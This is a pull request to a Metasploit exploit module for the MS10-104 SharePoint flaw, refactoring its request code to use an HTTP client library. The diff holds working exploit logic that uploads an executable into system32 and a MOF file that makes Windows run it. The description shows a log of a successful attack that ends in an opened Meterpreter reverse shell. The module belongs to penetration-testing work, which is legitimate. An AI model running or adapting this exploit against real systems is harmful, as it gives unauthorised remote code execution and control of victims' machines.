### PR TITLE
related to #980 adds support for HttpClient

### DIFF
--- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb
+++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
-	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::EXE
 	include Msf::Exploit::WbemExec
 
@@ -89,24 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		soap_convert_file << "</SOAP-ENV:Body>" << "\x0d\x0a"
 		soap_convert_file << "</SOAP-ENV:Envelope>" << "\x0d\x0a"
 
-		http_request = "POST /HtmlTrLauncher HTTP/1.1" << "\x0d\x0a"
-		http_request << "User-Agent: Mozilla/4.0+(compatible; MSIE 6.0; Windows 5.2.3790.131072; MS .NET Remoting; MS .NET CLR 2.0.50727.42 )" << "\x0d\x0a"
-		http_request << "Content-Type: text/xml; charset=\"utf-8\"" << "\x0d\x0a"
-		http_request << "SOAPAction: \"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile\"" << "\x0d\x0a"
-		http_request << "Host: #{rhost}:#{rport}" << "\x0d\x0a"
-		http_request << "Content-Length: #{soap_convert_file.length}" << "\x0d\x0a"
-		http_request << "Connection: Keep-Alive" << "\x0d\x0a\x0d\x0a"
-
-		connect
-		sock.put(http_request << soap_convert_file)
-		data = ""
-		read_data = sock.get_once(-1, 1)
-		while not read_data.nil?
-			data << read_data
-			read_data = sock.get_once(-1, 1)
-		end
-		disconnect
-		return data
+		res = send_request_cgi({
+			'uri'          => '/HtmlTrLauncher',
+			'method'       => 'POST',
+			'ctype'        => 'text/xml; charset="utf-8"',
+			'headers'      =>
+				{
+				'SOAPAction'      => '"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile"',
+				},
+			'data' => soap_convert_file
+		})
+		return res
 	end
 
 	# The check tries to create a test file in the root
@@ -119,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}")
 		res = upload_file(filename, contents)
 
-		if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
+		if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/
 			return Exploit::CheckCode::Vulnerable
 		else
 			return Exploit::CheckCode::Safe
@@ -138,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}")
 		res = upload_file("WINDOWS\\system32\\#{exe_name}", exe)
-		if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
+		if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/
 			print_good("#{peer} - #{exe_name} uploaded successfully")
 		else
 			print_error("#{peer} - Failed to upload #{exe_name}")
@@ -147,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")
 		res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
-		if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
+		if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/
 			print_good("#{peer} - #{mof_name} uploaded successfully")
 		else
 			print_error("#{peer} - Failed to upload #{mof_name}")


### PR DESCRIPTION
_WARNING_ Since #980 has been merged it can be merged once someone eyeballs / test

Working after support for 100-Continue responses on HttpClient:

<pre>
msf  exploit(ms10_104_sharepoint) > check

[*] 192.168.172.136:8082 - Sending HTTP ConvertFile Request to upload the test file IQXomhmiNdXHO.txt
[+] The target is vulnerable.
msf  exploit(ms10_104_sharepoint) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8082 - Sending HTTP ConvertFile Request to upload the exe payload vcKmCjA.exe
[+] 192.168.172.136:8082 - vcKmCjA.exe uploaded successfully
[*] 192.168.172.136:8082 - Sending HTTP ConvertFile Request to upload the mof file rVjiRXB.mof
[+] 192.168.172.136:8082 - rVjiRXB.mof uploaded successfully
[*] Sending stage (752128 bytes) to 192.168.172.136
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:1302) at 2012-10-31 17:37:15 +0100

meterpreter > exit -y
[*] Shutting down Meterpreter...

</pre>
